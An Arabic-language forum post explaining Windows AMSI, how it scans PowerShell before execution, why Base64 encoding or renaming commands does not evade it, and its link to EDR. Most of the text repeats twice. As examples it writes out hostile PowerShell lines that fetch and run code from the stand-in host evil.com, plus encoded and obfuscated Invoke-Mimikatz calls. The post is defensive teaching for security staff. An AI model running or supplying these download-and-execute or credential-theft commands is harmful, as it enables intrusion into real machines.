- بواسطة x32x01 ||
تخيّل إنك كتبت أمر في PowerShell، قبل ما الأمر يتنفذ، في واحد واقف يراجع اللي كتبته ويقول:
آمن؟ كمّل
خطر؟ وقف فورًا
الحارس ده اسمه AMSI - Anti-Malware Scan Interface
وده يعتبر حلقة الوصل بين:
أي كود يعدّي على AMSI الأول قبل ما يتنفذ
ليه مايكروسوفت عملت AMSI؟
زمان، برامج الحماية كانت بتركّز على:
ماذا لو:
مثال خطير
الأمر ده:
يفحص الكود أثناء التنفيذ مش بعده
كيف يعمل AMSI خطوة بخطوة؟
السيناريو بسيط جدًا:
انت تكتب أمر في PowerShell
PowerShell يوقف لحظة
يبعت الكود لـ AMSI
AMSI يديه لبرنامج الحماية
القرار:
AMSI مش بيقرر لوحده، هو بس الوسيط
AMSI بيفحص إيه بالظبط؟
AMSI مش ساذج، ومش بيدوّر على كلمات وخلاص.
لو كتبت:
الاسم لوحده إنذار خطر
حتى لو غيرت الأسماء، AMSI بيسأل:
سلوك واضح = هجوم
حتى لو الكود مكتوب بشكل مختلف، لو النمط شبه هجوم معروف → يتم اكتشافه.
هل التشفير يخدع AMSI؟
ناس كتير فاكرة إن: "لو شفرت الكود Base64 خلاص كده أمان" وده غلط تمامًا
مثال:
PowerShell:
ويتمنع فورًا
علاقة AMSI بأنظمة EDR
AMSI هو: عين الـ EDR جوه PowerShell وباقي السكربتات
Word اتفتح
فتح PowerShell
PowerShell حمّل ملف
حاول يسرق بيانات
الـ EDR يربط الأحداث ويقول: ده هجوم كامل مش صدفة
أخطاء شائعة عند المبتدئين
غلط
لسه في:
تغيير:
مش كفاية لأن السلوك نفسه لسه موجود
الخلاصة
AMSI:
قبل ما تفكر إزاي تشتغل في بيئة حقيقية
ولو Blue Team / SOC: AMSI صديقك الأقرب في كشف الهجمات المبكرة
آمن؟ كمّل خطر؟ وقف فورًاالحارس ده اسمه AMSI - Anti-Malware Scan Interface
وده يعتبر حلقة الوصل بين:- البرامج اللي بتشغّل كود (زي PowerShell)
- برامج الحماية (زي Windows Defender)
أي كود يعدّي على AMSI الأول قبل ما يتنفذليه مايكروسوفت عملت AMSI؟ 
زمان، برامج الحماية كانت بتركّز على:- الملفات اللي على الهارد
يعني لو شغّلت ملف exe، يتم فحصه وخلاص.
ماذا لو:
- مفيش ملف أصلًا؟
- الكود شغال من الذاكرة مباشرة؟
مثال خطير 
Code:
IEX (New-Object Net.WebClient).DownloadString('http://evil.com/hack.ps1')- ما كتبش ملف
شغّل الكود من الذاكرة
الحماية القديمة ما تشوفش حاجة
يفحص الكود أثناء التنفيذ مش بعده
كيف يعمل AMSI خطوة بخطوة؟ 
السيناريو بسيط جدًا: انت تكتب أمر في PowerShell PowerShell يوقف لحظة يبعت الكود لـ AMSI AMSI يديه لبرنامج الحماية القرار:
آمن → يتنفذ
خطر → يتمنع
AMSI مش بيقرر لوحده، هو بس الوسيط
AMSI بيفحص إيه بالظبط؟ 
AMSI مش ساذج، ومش بيدوّر على كلمات وخلاص. أسماء أوامر معروفة
لو كتبت: Invoke-Mimikatz الاسم لوحده إنذار خطر السلوك المتوقع
حتى لو غيرت الأسماء، AMSI بيسأل:- هل الكود بيحمّل ملف؟
- هل بيشغله فورًا؟
- هل بيحاول يوقف الحماية؟
Code:
Invoke-WebRequest http://evil.com/a.exe -OutFile a.exe
Start-Process a.exe الأنماط (Patterns)
حتى لو الكود مكتوب بشكل مختلف، لو النمط شبه هجوم معروف → يتم اكتشافه.
هل التشفير يخدع AMSI؟
ناس كتير فاكرة إن: "لو شفرت الكود Base64 خلاص كده أمان" وده غلط تمامًا مثال:
Code:
powershell -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA- يفك التشفير الأول
- يبعت الكود الحقيقي لـ AMSI
Invoke-Mimikatz ويتمنع فورًا
علاقة AMSI بأنظمة EDR 
يعني إيه EDR؟
Endpoint Detection and Response أنظمة ذكية بتراقب كل اللي بيحصل على الجهاز. AMSI هو: عين الـ EDR جوه PowerShell وباقي السكربتاتسيناريو خطير:
Word اتفتح فتح PowerShell PowerShell حمّل ملف حاول يسرق بيانات الـ EDR يربط الأحداث ويقول: ده هجوم كامل مش صدفة
أخطاء شائعة عند المبتدئين
"لو عطّلت AMSI أنا بأمان"
غلط لسه في:
- Event Logs
- ETW
- Network Monitoring
- Memory Scanning
"أغيّر أسماء الأوامر وخلاص"
تغيير:Invoke-MimikatzInv0ke-Mim1k@tzمش كفاية لأن السلوك نفسه لسه موجود
الخلاصة
AMSI:- مش عدو
- مش حاجة تتكسر
- ده نظام معمول عشان يحمي ويندوز بذكاء
قبل ما تفكر إزاي تشتغل في بيئة حقيقيةولو Blue Team / SOC: AMSI
صديقك الأقرب في كشف الهجمات المبكرة